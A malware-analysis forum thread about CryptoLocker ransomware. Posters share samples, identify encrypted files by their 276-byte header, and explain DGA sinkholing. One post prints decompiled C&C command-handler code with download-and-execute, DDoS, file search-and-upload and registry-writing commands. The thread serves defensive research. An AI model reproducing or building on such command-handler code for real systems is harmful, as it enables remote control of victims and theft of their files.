[TwinHeadedEagle]

Anyone got this sample?

http://blog.trendmicro.com/trendlabs-se ... le-drives/

I am pretty sure this CryptoLocker 2.0 posted above.

Yes, thanks, I already tried it succesfully :)

[Artilllerie]

For information here is the code of the C&C commands :

Code: Select all

string result;
	try
	{
		string_2 = string_2.Trim();
		if (string_2.ToLower().Trim().Contains("[end]"))
		{
			result = "finalized";
			return result;
		}
		if (string_2.StartsWith("writeregistry"))
		{
			string[] string_3 = string_2.Split(new char[]
			{
				'|'
			});
			result = Conversions.ToString(this.method_14(string_3));
			return result;
		}
		if (string_2.StartsWith("ddose"))
		{
			string[] string_4 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_13(string_4);
			return result;
		}
		if (string_2.StartsWith("download"))
		{
			string[] string_5 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_12(string_5, false);
			return result;
		}
		if (string_2.StartsWith("execute"))
		{
			string[] string_6 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_11(string_6);
			return result;
		}
		if (string_2.StartsWith("downloadandexecute"))
		{
			string[] string_7 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_12(string_7, true);
			return result;
		}
		if (string_2.StartsWith("disallowshutdown"))
		{
			string[] string_8 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_10(string_8);
			return result;
		}
		if (string_2.StartsWith("searchupload"))
		{
			string[] string_9 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_9(string_9);
			return result;
		}
		if (string_2.StartsWith("showmessage"))
		{
			string[] string_10 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_8(string_10);
			return result;
		}
		if (string_2.StartsWith("enablesockets"))
		{
			string[] string_11 = string_2.Split(new char[]
			{
				'|'
			});
			result = Conversions.ToString(this.method_7(string_11));
			return result;
		}

Note the "ddose" command related to what Cody Johnston said above ;).

[thisisu]

Hi all,

Can someone please take a look at this file and let me know what type of malware it came from?

Message from the user on Jan 18th, 2013:

Code: Select all

I have been attacked by a virus where all my excel, word, music files have been encrypted. My restore also sates that it has been unable to complete. When I first turned my computer on I received a message saying all my files were encrypted and sent to the police and that I would have to send £100 to get them unencrypted. I am not very computer literate so if there is a fix I would need to have clear simple detailed steps. I hope you can help as I desperately need a couple of my Excel files.

[Fabian Wosar]

Can someone please take a look at this file and let me know what type of malware it came from?

CryptoLocker. You can easily determine it yourself:

CryptoLocker files have a 276 byte header. The header essentially contains a SHA-1 hash (20 bytes) as well as a 256 byte key blob storing the encrypted AES key. The hash is calculated over four zero bytes and the key blob. So essentially you can check if the first 20 bytes are equal sha1(0x00000000<key blob>).

I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.

[thisisu]

I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.

I'm interested. Thank you for reviewing the file. :)

[AliveNoMore]

I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?

[Fabian Wosar]

I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?

CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.

[AliveNoMore]

I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?

CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.

Hm, thought it would actually be VM aware. Anyway, I suppose the only thing I can do to test it is to just let it run and hope it would manage to find a C2 server that isn't sinkholed, which could take a quite while?

[Grinler]

Just thought I'd add this for completeness: http://www.zdnet.com/cryptolockers-crim ... 000024579/

They are using only 3 bitcoin addresses since the first infection, literally every bitcoin transaction is publicly logged by multiple parties this includes ones to exchanges and every single one leaving these 3 addresses, yet they've cashed out literally tens of millions of USD and nobody knows who they are or even where on earth they are located.. Someone is extremely lazy or hiding something and it's not the authors of this malware..

When Crilock infects a computer it generates a new bitcoin address. Only in the beginning were they using static addresses.

[hx1997]

low detection of 2/49
https://www.virustotal.com/file/59cb0ec ... /analysis/